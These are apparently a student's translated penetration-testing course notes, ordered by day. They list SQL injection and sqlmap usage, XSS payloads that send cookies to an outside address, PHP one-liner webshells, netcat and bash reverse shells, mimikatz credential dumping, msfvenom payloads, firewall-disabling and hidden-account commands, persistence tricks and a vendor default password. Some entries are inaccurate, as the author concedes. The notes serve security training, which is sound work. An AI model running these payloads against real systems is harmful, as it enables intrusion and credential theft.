Note: the following only records the knowledge I did not know while I was studying. The notes are sloppy and may be wrong; they are for reference only. I will gradually improve them!
Basically complete penetration testing framework
Day1
chmod
mv: rename (move) a file
The http request contains:
Request line
Request header
Request body
A GET request has no request body
GET vs POST
1. Request parameters
-get
501 Method Not Implemented
3xx: redirect
SQL injection:
1. Detect: ' or "
2. Comment: # or --
Union query:
1. order by
2. union select 1,2
3. Database: database()
4. Tables: information_schema.tables
5. Columns: union select column_name,2 from information_schema.columns where table_schema=database() and table_name='users'#
6. Content: union select user,password from users#
and ascii(mid((select user from users limit 0,1),1,1))>96
Boolean (blind) injection:
and 1=1
and 1=2
Database
Table: exists(select * from users)
Column: exists(select column_name from users)
Content: and (select user from users limit 1,2) / select mid("hello word",2,1) takes one character starting at the second position
0-9: 48, 0x30
a-z: 97, 0x61   select ascii('A')
A-Z 65 0x65
URL encoding: start with %, %20 is a space
sleep() time-based delay: select if(exists(select * from user),sleep(5),3)
Assignment: hub.docker.com
Questions 3, 5, 9
docker pull
docker run
Day3:
concat("hell","word!") string concatenation
select ord(':') view the ASCII code
hex(68) convert to hexadecimal
group_concat(username,0x3a,password) display on one line
-Error-based injection:
-floor
select floor(rand(0)*2)
rand(0) random number (fixed seed)
-updatexml(1,concat(0x7e,version(),0x7e),3)   version() can be replaced with an SQL statement
-extractvalue works the same way
-Second-order injection:
-insert into users values('admin','pwd')
-update users set pwd='123' where name='name'
-Universal password (login bypass)
-File reading and writing
-Prerequisites:
-File
-my.cnf/my.ini
-secure_file_priv=""
-Read files
-load_file('path') absolute path
/etc/passwd stores user information
-Write files
-into outfile 'path'
-into dumpfile 'path'
-Bypass techniques
-Replace or with ||, and with &&
-Case variation
-Double writing. To counter this, filter in a loop until nothing more is removed
-Inline comments
-Space %20+ — ,)), %a0 %0b –=ss %2b
-Comment: # or --+   "closing" means closing the preceding quote so that what follows is commented out
-POST
-sqlmap
-Basic usage
1. Detect: sqlmap -u "url"
2. Databases: sqlmap -u "url" --dbs / --current-db
3. Tables: sqlmap -u "url" -D db --tables
4. Columns: sqlmap -u "url" -D db -T tb --columns
5. Content: sqlmap -u "url" -D db -T tb -C col --dump
For POST requests: sqlmap -r 1.txt
sqlmap -r 1.txt -vv -D security   -v shows detailed information, including what was sent
-Write tamper scripts
-Command execution
-Multiple command separators
;
|| (or): the right side runs only when the left side fails
|
&&; a single & runs the command as a background process
wget
echo
-File inclusion
-#include<stdio.h> (the C analogue)
-PHP include() require()
config.inc.php --db
Example: http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd
-LFI
-Whatever the suffix is, if the file contains PHP code it will be executed
-PHP pseudo-protocols
-php://filter/read=convert.base64-encode/resource=1.php
<?php
system('whoami');
?>
-RFI
-http://localhost:8001/vulnerabilities/fi/?page=http://192.168.38.1/1.txt remote file inclusion
-XSS (HTML injection)
-JS statements
-document.cookie to get the cookie
-Stored XSS
<script>document.location='http://your address'+document.cookie</script>
<script>
document.write("<img src='http://"+document.cookie+"'/>");
</script>
-File upload (capture the request, send it to Repeater, modify the suffix)
-One-liner webshell
<?php @eval($_POST[1]);?>
<?php @system($_GET[1]);?>
<?php $_GET[0]($_POST[1]);?>   When connecting, append 0=assert to the URL
Client tools:
AntSword
Principle: 1=@eval(base64_decode($_POST[2]));&2=system('ls …/');
-Checks
-Client-side JS checks
-Suffix
-Case variation: php3, php4, php5, phtml
Apache:
-.htaccess
Content: AddType application/x-httpd-php .gif   Meaning: parse .gif files as PHP
-Types
-image/gif
-image/png   These are the Content-Type values
-image/jpeg
-File header
-GIF89a gif file header
-File content
<?php $_GET[0]($_POST[1]);?>   ?0=assert
Day 6
-XSS
-BeEF
-BlueLotus (XSS platform)
-File inclusion
-php://input
-File upload
-%00 truncation
-WebGoat
-hashcat -a 0 -m 0 md5.hash <dictionary path>
Day7
-XXE
chown change the owner, e.g. chown www-data upload
chgrp change the group
reboot / shutdown -r now   restart
init 0   shutdown
Day8
-JWT: JSON Web Token
-HS256 is HMAC-SHA256
hashcat -a 0 -m 1450 (hash-mode id) <hash file> <dictionary path>
import base64, hashlib, hmac
def hmac_base64(key, message):
    # HMAC-SHA256 of message under key, base64url-encoded (a JWT additionally strips the trailing '=' padding)
    return base64.urlsafe_b64encode(hmac.new(key, message, hashlib.sha256).digest())
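A fuller picture of what the HS256 line above computes, as an added example that is not part of the original notes: signing and verifying a JWT, where the signature is nothing more than HMAC-SHA256 over "header.payload" (which is why hashcat mode 1450 applies to it). The key and claims are constructed.

```python
"""Sign and verify a JSON Web Token with HS256 (HMAC-SHA256). Added example."""
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url(data: bytes) -> str:
    """JWT uses base64url without the trailing '=' padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Restore the padding that b64url() stripped, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(key: bytes, header: dict, payload: dict) -> str:
    """Return header.payload.signature for the given claims."""
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def hs256_verify(key: bytes, token: str) -> Optional[dict]:
    """Return the payload if token is a valid HS256 token under key, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    # The server, not the token, decides the algorithm: reject "none" or anything else.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    # Constant-time comparison so the check does not leak how many bytes matched.
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    key = b"constructed-demo-key"  # constructed; a real key must be long and random
    token = hs256_sign(key, {"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "admin": False})
    print(token)
    print(hs256_verify(key, token), hs256_verify(b"wrong-key", token))
```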
Day9
-OWASP Top 10
-Sensitive information leakage
-in transit
-at rest
-Insecure deserialization
<?php
$aaa = array("1", "2", 123);
echo serialize($aaa);
?>
result: a:3:{i:0;s:1:"1";i:1;s:1:"2";i:2;i:123;}
Books: "OWASP Testing Guide"
"The Web Application Hacker's Handbook" (Chinese edition title: Hacker Attack and Defense Technology Collection, Web Practice)
Websites:
vulhub.org vulnerability lab
vulnhub.com
-Frameworks
-Flask
-Multithreading
Day10
-CISP (certification)
Software/websites:
-ip138
-licence
Security products:
-Gateway: EW, ZPS, FS
-Endpoint: AV, patching, NAC (network access control), EDR, DLP
-Audit: log audit, database audit, VPN, bastion host
-Monitoring: APT, SOC, honeypot
Day 11:
-MLPS compliance (等保, Classified Protection of Cybersecurity)
Day12:
-PHP7 webshell implementation
-One-liner webshell
-PoC: proof of concept
-payload
-Link layer: CRC
-Network layer: packet, header only
-DNS resolution uses UDP; server-to-server communication uses TCP
-vi commands
-x delete the current character
-dd delete the current line
-comm -1 1.txt 2.txt find the common and differing lines
-diff 1.txt 2.txt find the differences
-diff -c 1.txt 2.txt show the differences with context; -u shows a unified diff with both sides together
-vimdiff 1.txt 2.txt
-ps view processes
-tail 1.txt
-tail -f 1.txt follows the file as it grows. vim does not seem to do this.
-watch -n 5 monitor; -n is the refresh interval in seconds
-watch -n 5 w monitor the w command
-wget download a file
-curl -o download a file
-Environment preparation
-Windows 7
-Windows 2008 R2 https://msdn.itellyou.cn/
-Linux
-Ubuntu 14 / Metasploitable2 vulnhub.com
-Tools
-Swiss army knife: netcat
-nc -lvp 3333 listen on a port
-nc -l localhost 4444 connect to a port
-n do not resolve DNS names
-v show detailed information
-e followed by the command to execute
-File transfer
-Receiver: nc -lvp 4444 > 1.txt
-Sender: nc ip/domain port < 1.txt
-Bind shell
-Server: nc -lvp 444 -e cmd.exe
-Attacker nc -nv ip port -e cmd.exe
-Reverse shell
-attacker
-nc -lvp 444
-server
-nc -nv ip port -e cmd.exe
Day12
-Information gathering
-Active
-DNS
-Port/OS
-nmap
-nmap -p- -Pn -n ip
-nmap -p 21 -sV -Pn -n --script=xx ip
-nmap -O ip
-nmap -A -F ip
-nmap -Pn -n --script=ftp-vsftpd-backdoor 192.168.174.129
-Vulnerability scanning
-Debian 6 amd64 .deb: sudo dpkg -i ./nessusxxxx.deb; sudo service nessusd start
-Web scanning
-AWVS
-IBM AppScan
-HP WebInspect
-xray
-xray webscan --listen 127.0.0.1:7777 --html-output 1.html
-Combined with Burp
-Set connections under User options
-destination host: ip
-proxy host: 127.0.0.1
-proxy port: 7777
-whois registration information
-Webmaster’s Home
-Microstep
-google hacking
- -site:
- -filetype:File type Preceded with-sign means not to look at this type
- -inurl:
- -error:What errors have been reported
- -GHDB
- https://searchdns.netcraft.com
- Recon-ng
- -github
- Shodan/fofa/zoomeye
- https://securityheaders.com/
- https://ssslabs.com/
- https://pastebin.com/
- Theharvester Check mailbox
- Social Work Library
- Network disk/historical vulnerability information/stack overflow
- NDSRecon
-record
Megacorpone.com
-Password cracking
-Dictionaries
wordpass.com
-Generate (social engineering dictionary)
-cewl: cewl -d 2 -m 6 -w ./1.txt http://www.megacorpone.com
sudo apt install crowbar
Online cracking (remote): medusa, hydra
Network services (db, ftp, ssh, rdp)
Web: Burp
HTTP Basic
Offline cracking (local): hashes; the hashid command identifies which kind of hash it is
-Windows
C:\Windows\System32\config\SAM (a registry hive; decrypting it also needs the SYSTEM hive)
-Hash type: NT/NTLM
-Tools: pwdump7/samdump2
-Linux
-/etc/passwd
-/etc/shadow
-SHA-512 is the hash in use
-Rainbow tables address:
-In memory: plaintext
-mimikatz
privilege::debug
sekurlsa::logonpasswords
-mysql
-Other hashes
Day14
-Engagement process
Liaise with the technical contacts
-Default port number (well-known port) range 0-1035
Firewall/IPS/ICG deployment modes
-Bridge mode (transparent mode)
-In-band management
-Out-of-band management
-Routing mode (not commonly used)
-Bypass mode
Day15
-ICG management methods
-Web
-Console, baud rate 9600, icgadmin/netentsec
-SSH (13289)
-Default management address of the firewall: https://10.0.0.1
msfvenom
From <https://blog.csdn.net/ZmeiXuan/article/details/78061755>
Policy routing priority
-Host route -> directly connected route -> static route (including dynamic routes) -> policy route -> ISP route -> default route
Day16
-Vulnerability analysis/exploitation
-Application layer: web
-General: OWASP Top 10
-CMS: WordPress/Discuz/Joomla
-Development frameworks
-PHP: ThinkPHP
-Java: SSM
-Python: Flask/Django
-General frameworks: es
-Middleware: Tomcat/WebLogic
CVE / exploit-db (a website) / searchsploit
-Databases:
-Relational: MySQL, MSSQL, Oracle
-Non-relational: Redis/MongoDB
-Operating systems
-Windows
-445
-Linux
-Dirty COW
-Network layer:
Variables start with $
Fuzz fuzz test
Phpinfo()
Substring(database_version(),1,1)
From
whoami
Not absolutely safe
Github: list
Kali restart network commands
sudo systemctl restart networking
sudo systemctl restart NetworkManager
0-65536
2Mbps=0.25MBps
The default account password for all QiAnXin products:
Admin/!1ws
Writing a one-liner webshell under Linux: pay attention to escaping
Low authority:
Privilege escalation:
-Local/remote
-Exploit OS vulnerabilities
-Database
-Third-party software
Exploits
-.py
-.php
-.pl Perl
-.rb Ruby, generally used with msf
-.c compile with gcc, then run
-.txt/.md: web application vulnerabilities
-Scan for admin backends
-dirb tool
Linux permissions
-rw-r--r-- 1   this number is the link count; for directories it is at least 2, because every directory contains . and ..
10 characters
User, group, other
-: ordinary file
d: directory
l: link (shortcut)
b/c: device file
-rws r-x r-x: s means other users execute the file with the permissions of the file owner
The octal representation is 4755; the other special bit is displayed as t (the sticky bit, as on /tmp)
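To make the mapping from the 10-character mode string to the octal value concrete, here is an added example (not part of the original notes) that converts an ls -l style string such as -rwsr-xr-x to 4755, including the s and t bits described above.

```python
"""Convert an ls -l mode string (e.g. '-rwsr-xr-x') to its octal mode. Added example."""
import stat

# Plain permission bit for each of the nine positions after the type character.
_PERM_BITS = [
    stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
    stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
    stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH,
]
# The three execute positions may show a special bit instead of 'x':
# setuid (user), setgid (group), sticky (other).
_SPECIAL_BITS = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}


def mode_to_octal(mode_str: str) -> int:
    """Return the numeric mode (special bits included) for a 10-character mode string."""
    if len(mode_str) != 10:
        raise ValueError("expected a 10-character mode string such as '-rw-r--r--'")
    perms = mode_str[1:]  # first character is the file type: -, d, l, b, c, ...
    mode = 0
    for idx, ch in enumerate(perms):
        if ch == "-":
            continue
        if idx in _SPECIAL_BITS and ch in "sStT":
            mode |= _SPECIAL_BITS[idx]
            if ch in "st":  # lowercase: the execute bit is set as well
                mode |= _PERM_BITS[idx]
        elif ch == "rwx"[idx % 3]:
            mode |= _PERM_BITS[idx]
        else:
            raise ValueError(f"unexpected character {ch!r} at position {idx + 1}")
    return mode


def is_setuid(mode_str: str) -> bool:
    """True for the files that `find / -perm -4000` would list."""
    return bool(mode_to_octal(mode_str) & stat.S_ISUID)


if __name__ == "__main__":
    for sample in ("-rw-r--r--", "-rwsr-xr-x", "drwxrwxrwt", "-rwSr--r--"):
        print(f"{sample}  {mode_to_octal(sample):o}  setuid={is_setuid(sample)}")
```

A capital S or T means the special bit is set without the matching execute bit, which is usually a misconfiguration worth a second look.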
There are many privilege escalation exploits for Linux and Windows on GitHub
In the passwd file:
root:x:0:0:root:/root:/bin/bash   x is a placeholder for the password (it lives in shadow); an empty field means no password
In the shadow file:
root:!:18470:0:99999:7:::   ! indicates the account cannot log in (locked). 18470 is the number of days since January 1, 1970, i.e. when the password was last changed
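An added example, not part of the original notes, that turns shadow entries like the one above into readable fields: the lock marker, the hash scheme from the $id$ prefix, and the day count converted to a calendar date (18470 becomes 2020-07-27). The sample lines are constructed and the $6$ hash is a placeholder.

```python
"""Parse /etc/shadow entries into readable fields. Added example."""
from datetime import date, timedelta

EPOCH = date(1970, 1, 1)  # field 3 (last change) counts days from here
HASH_TYPES = {"$1$": "md5", "$5$": "sha256", "$6$": "sha512", "$y$": "yescrypt"}

# Constructed sample entries; the $6$ value is a placeholder, not a real hash.
SAMPLE_SHADOW = """\
root:!:18470:0:99999:7:::
alice:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:18262:0:99999:7:::
daemon:*:18262:0:99999:7:::
"""


def hash_type(pw_field: str):
    """Name the hash scheme from the $id$ prefix, or None if there is no hash."""
    for prefix, name in HASH_TYPES.items():
        if pw_field.startswith(prefix):
            return name
    return None


def parse_shadow_line(line: str) -> dict:
    """Split one shadow entry (9 colon-separated fields) into named values."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}: {line!r}")
    name, pw, last_change, _min_age, max_age, _warn, _inactive, _expire, _ = fields
    return {
        "user": name,
        # A leading '!' marks a locked password; '*' means password login is impossible.
        "locked": pw.startswith("!") or pw == "*",
        "no_password": pw == "",  # empty field: no password is required
        "hash_type": hash_type(pw.lstrip("!")),
        "last_change": EPOCH + timedelta(days=int(last_change)) if last_change else None,
        "max_age_days": int(max_age) if max_age else None,
    }


def parse_shadow(text: str) -> list:
    """Parse every non-empty line of a shadow file."""
    return [parse_shadow_line(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for entry in parse_shadow(SAMPLE_SHADOW):
        print(entry)
```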
Linux firewall
iptables
setenforce
View OS information:
/etc/os-release
lsb_release
Users added under /etc/sudoers.d can use sudo
Find files with the s (setuid) bit: sudo find / -perm -4000 2>/dev/null
touch create a file
echo "`command`"   backquotes mean execute as a command
DAY17
-Windows basics
Help: command /?
-System information
ver
winver
systeminfo
-Users
-Computer management: compmgmt.msc
-SAM is essentially the registry; the command is regedit
Group policy command: gpedit.msc
SID:
Administrator 500
Guest 501
net user   view users
net user <username> <password>   change password
net user <username> /active:yes   activate account
See the help for the others
Add $ to the end of the username to hide the account
net localgroup administrators   view this group
-Firewall
Turn off the firewall
-net stop sharedaccess
-netsh firewall set opmode disable
-netsh advfirewall set allprofiles state off
-Open 3389
reg add "HKLM\system\currentcontrolset\control\terminal server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-View the port
-reg query "HKLM\system\currentcontrolset\control\terminal server\winstations\rdp-tcp" /v portnumber
After msfvenom generates the payload, enter msfconsole and run: use exploit/multi/handler
-Change environment variable command
-export
su tom   switch user
Day18
-gobuster tool
nmap privilege escalation
git privilege escalation
awk privilege escalation
msf listener exploit/mu; msfvenom generation: msfvenom -p <payload> lhost=ip -f exe -a x64 -o shell.exe
Day19
Firewall
-Linux turn off the firewall
-service iptables stop
-system
-bash -i >& /dev/tcp/ip/port 0>&1
-powershell
-Port forwarding
-msf can do it
rdesktop tool command: rdesktop ip
Step 1: generate a reverse-connecting exe with msfvenom and deliver it to the other side
Step 2: start the listener in msfconsole; the other side runs the exe
Step 3: after the session connects, run the remote desktop port-forwarding command
Step 4: connect to your own 3389 with the rdesktop command
VM networking
-NAT
-Bridged
-Host-only
Linux default proxy configuration: /etc/proxychains.conf
Nmap scans are best run with -Pn (skip the ping/host-discovery step) for protocol reasons, such as
Day20
msf: post modules
Cobalt Strike: red team
Channels:
-dns/icmp
Behinder (Ice Scorpion) webshell; Xici proxy (free proxy list for changing IP)
Kerberos authentication in a Windows domain; golden ticket; SSO
-TGT: ticket granting ticket
The privilege escalation modules are often used in msf against domains: search psexec
Day21
File transfer
FTP
-FileZilla/Serv-U
-pure-ftpd/vsftpd
put and get
HTTP
echo $webclient = New-Object System.Net.WebClient >> wget.ps1   open a web client under Windows
echo $url = "http://192.168.174.128:4444/hello.txt" >> wget.ps1   file address under Kali
echo $file = "exploit.txt" >> wget.ps1   name of the saved file under Windows
echo $webclient.DownloadFile($url,$file) >> wget.ps1   download the file
The following requires a web service to be running on Kali
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>   or
powershell.exe -ExecutionPolicy Bypass -File <filename>
powershell.exe (New-Object System.Net.WebClient).DownloadFile
Anti-virus bypass
-Signature bypass
-Sandbox
Static
-PE/ELF
-IDA Pro
Dynamic
-Debugging
-Sandbox: behaviour monitoring of files/registry/network connections
Shellter tool injects code into normal PE files such as notepad.exe; the host must be a 32-bit program
Empire tool, similar to msf, written in PowerShell, mostly PowerShell modules
Persistence
-Windows
-Shift (sticky keys)
sethc.exe
-Image hijacking (IFEO)
-Remote control trojan
-Linux
-suid
-LD_PRELOAD
Clearing traces
Metasploitable3 target machine penetration
The binwalk command checks whether an image contains multiple embedded files and separates them
knock ip port
See knockd.conf; port knocking can be used
View file attributes under Windows
attrib
Encryption under Windows: EFS and
BitLocker (disk encryption)
icacls under Windows is the command to change permissions
lsattr views file attributes under Linux
Intranet penetration proxy cannot use VPN or frp
To be continued………….